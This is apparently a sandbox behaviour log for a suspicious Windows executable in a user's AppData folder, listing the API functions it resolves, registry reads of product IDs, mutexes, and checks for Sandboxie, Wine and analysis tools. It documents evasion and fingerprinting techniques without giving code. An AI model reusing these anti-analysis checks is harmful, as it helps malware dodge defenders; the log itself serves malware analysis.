| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x75a2735f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75a03f5c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x75a0424c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x75a016dd |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75a01410 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x75a016c5 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x75a010ff |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x75a0183e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75a01136 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x75a04220 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75a0110c |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x75a0186e |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x757b49ea |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x757b8deb |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x757afbd1 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x757b1218 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x772a25dd |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x757a8a29 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x757a9f84 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x757b2e69 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x757b3e75 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75801a26 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x757a7809 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x757b05ba |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x757a787b |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x757b0b4a |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x757ab17d |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x757b6110 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x757ad156 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x757af350 |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x75790000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x757a9a55 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x758d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x758e6c0e |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x758d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x758dd718 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x756f469d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x756f45f0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7570779b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x756f0e0c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x756f40e6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x756f0e24 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x756f2a66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x756f40fe |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x756ec54a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x756e9fe2 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x756ef4fd |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x756edf4e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x756edf36 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x756f4680 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x756f14d6 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x756edf66 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x756f4304 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x756f412e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x756f4620 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x756f468d |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x756ec532 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x756f1f59 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x756f432c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x756f46ad |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x756ee124 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x756f431c |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x756ec51a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x756f418e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x756f415e |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x756f4608 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x756f41b3 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x756f413b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x756ecf31 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7570773f |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x756ee15b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x756f46e7 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x756f445b |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7573db3a |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x756e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x756edf14 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75c63c71 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75c71e46 |
|
1 | |
| Module | Load | module_name = SHELL32.dll, base_address = 0x75c50000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x75cd5708 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x750e45bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x750e55bf |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x7510cd81 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x750e4745 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7510d32a |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x750e46e9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x750e86f7 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x750ec39c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x750e3248 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x750ec177 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x7511066c |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x750e5331 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x750ffbf5 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x750ea1b9 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x750dfcca |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x750fedfe |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x750dff07 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x750e5c62 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x750fc6fb |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x750d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x7510ce21 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x74eb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x74eb13f0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x7546e599 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x754909ad |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x7547363b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75465ea5 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75499d0b |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x75450000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x754986d3 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75145689 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x75144de0 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7514e743 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x751454f4 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75144f70 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x75145f49 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x75145ea6 |
|
1 | |
| Module | Load | module_name = GDI32.dll, base_address = 0x75130000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x751458b3 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x753749e9 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x7536b406 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x7536a33e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75361b56 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75374c7d |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x7535d075 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x753675e8 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x7537f18e |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7536ab49 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x75350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x753e18f8 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\urlmon.dll, function = ObtainUserAgentString, address_out = 0x76c71d76 |
|
1 | |
| Module | Load | module_name = OLEAUT32.dll, base_address = 0x76b60000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = 9, address_out = 0x76b63eae |
|
1 | |
| Module | Load | module_name = Secur32.dll, base_address = 0x748e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\secur32.dll, function = GetUserNameExW, address_out = 0x74dea415 |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, base_address = 0x400000 |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = InstallDate, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = DigitalProductId |
|
1 | |
| System | Get Info | type = Operating System |
|
3 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77270000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlDosPathNameToNtPathName_U, address_out = 0x772cce41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtCreateFile, address_out = 0x772900a4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtClose, address_out = 0x7728f9d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtQueryEaFile, address_out = 0x77291314 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtSetEaFile, address_out = 0x772919b0 |
|
1 | |
| File | Create | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, desired_access = FILE_READ_EA, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = \??\C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, type = extended |
|
1 | |
| Mutex | Create | mutex_name = 9B4D68961731FE3C22DA08B640799EB6 |
|
1 | |
| Mutex | Open | mutex_name = E58EFF540968A436E982FCFA1C0445A2, desired_access = SYNCHRONIZE |
|
2 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\iuoldw.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\iuoldw.exe, size = 260 |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID |
|
2 | |
| File | Create | filename = C:\popupkiller.exe, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = C:\stimulator.exe, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = C:\TOOLS\execute.exe, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Module | Load | module_name = SbieDll.dll, base_address = 0x0 |
|
1 | |
| Mutex | Create | mutex_name = Sandboxie_SingleInstanceMutex_Control |
|
1 | |
| Mutex | Create | mutex_name = Frz_State |
|
1 | |
| File | Create | filename = \\.\NPF_NdisWanIp, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = wine_get_unix_file_name, address_out = 0x0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\WINE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\WINE |
|
1 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
28 | |
